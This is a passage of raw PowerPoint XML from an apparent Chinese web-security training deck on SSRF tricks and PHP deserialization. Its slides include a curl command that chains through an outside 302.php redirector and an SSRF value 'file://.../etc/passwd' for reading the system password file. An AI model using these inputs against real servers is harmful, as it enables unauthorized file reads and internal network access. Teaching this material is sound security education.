            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="777777"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en" altLang="zh-CN" sz="2000" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{990C09EB-BAEE-454E-97E5-E36BB822E61A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1137307" y="3846786"/>
            <a:ext cx="6127532" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2000" dirty="0"/>
              <a:t>HP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000"/>
              <a:t>中，仅当允许重定向时可用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41AD2D7A-32FB-7242-A3AE-802D234CF676}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1137307" y="5306085"/>
            <a:ext cx="8020144" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="AA3731"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>curl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="AB6526"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://zzm.cat/302.php?url=http://www.qq.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>com</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5DC8F53-2C1F-3A4F-B23F-9D0D76B55F5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1137307" y="4913119"/>
            <a:ext cx="6127532" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2000" dirty="0"/>
              <a:t>Curl</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000"/>
              <a:t>命令中，仅当有</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2000" dirty="0"/>
              <a:t>-L</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000"/>
              <a:t>参数时可用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F995A9B6-CF79-2D46-BAB1-F4315A5651E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1175785" y="1733248"/>
            <a:ext cx="1160895" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>302.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136771565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所需知识</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CE3915F-2A63-1743-A167-096F6DE68D95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1376680" y="2453640"/>
            <a:ext cx="8803640" cy="2239844"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Html</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>CSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>MDN</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>文档</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>编码：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t> url</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>编码，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>实体</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>编码</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>编码</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>缓存</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-432000">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>跨域问题，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>CSP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>策略</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DC65920-AE23-F743-BEB7-15325996284E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716280" y="1005840"/>
            <a:ext cx="5044440" cy="681725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>二</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" b="1" dirty="0">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
                <a:ea typeface="PingFang SC" panose="020B0400000000000000" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>前端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="154437412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en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Trick</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实例</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2628528D-429F-2E43-A186-7353734B7D37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="6917" r="26250"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="843280" y="2215343"/>
            <a:ext cx="10919951" cy="4594559"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="直线连接符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E0560B7-FE04-2243-A352-5E91D1A5EF91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2346960" y="2401946"/>
            <a:ext cx="356616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a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CFACCD73-E725-2547-901C-BD7735A6EBFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2346960" y="2478146"/>
            <a:ext cx="356616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A306B078-2955-E94A-AA7C-A0FBE44DC1FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="843280" y="1582710"/>
            <a:ext cx="8727440" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>url=file://mp.weixin.qq.com/etc/passwd?</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163726343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反序列化</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介绍</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="圆角矩形 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AFFE4B5-CA0C-4E49-BBA0-909EDA16096A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2255520" y="1889760"/>
            <a:ext cx="1356360" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>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kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000" b="1"/>
              <a:t>对象</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="圆角矩形 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{129E709F-7D10-9E46-9A9D-6BE3304343FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3931920" y="1889760"/>
            <a:ext cx="1356360" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>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kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000" b="1"/>
              <a:t>数组</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="圆角矩形 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69D0000A-9B57-2248-9DDD-43512054A260}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5608320" y="1889760"/>
            <a:ext cx="1356360" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>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kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000" b="1"/>
              <a:t>字符串</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="圆角矩形 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B653C270-4C5A-A24F-AC51-96AA592177F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7284720" y="1889760"/>
            <a:ext cx="1356360" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>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kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000" b="1"/>
              <a:t>数字</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="圆角矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81AB9DFE-DDD3-0642-9BDE-841C9544EC47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8915400" y="1889760"/>
            <a:ext cx="1356360" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>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zh-Hans" sz="4000" b="1" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="4000" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="下箭头 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D133D38-4793-8A48-920C-1A5665795809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5027930" y="3017520"/>
            <a:ext cx="405130" cy="1813560"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF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3496EE9C-C409-F346-BFCD-950DC89F4EA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3397250" y="3508801"/>
            <a:ext cx="1630680" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400"/>
              <a:t>序列化</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>erialize</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="圆角矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F2EB51B-37A5-F943-AE3C-9C4100315480}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5027930" y="5230921"/>
            <a:ext cx="1356360" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>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kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2000" b="1"/>
              <a:t>字符串</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="下箭头 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10FC4E5A-D618-4941-BA04-E1C54417A116}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6083935" y="3017520"/>
            <a:ext cx="405130" cy="1813560"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF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EAB17AD4-81FF-D240-AD13-7230EE88FD4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
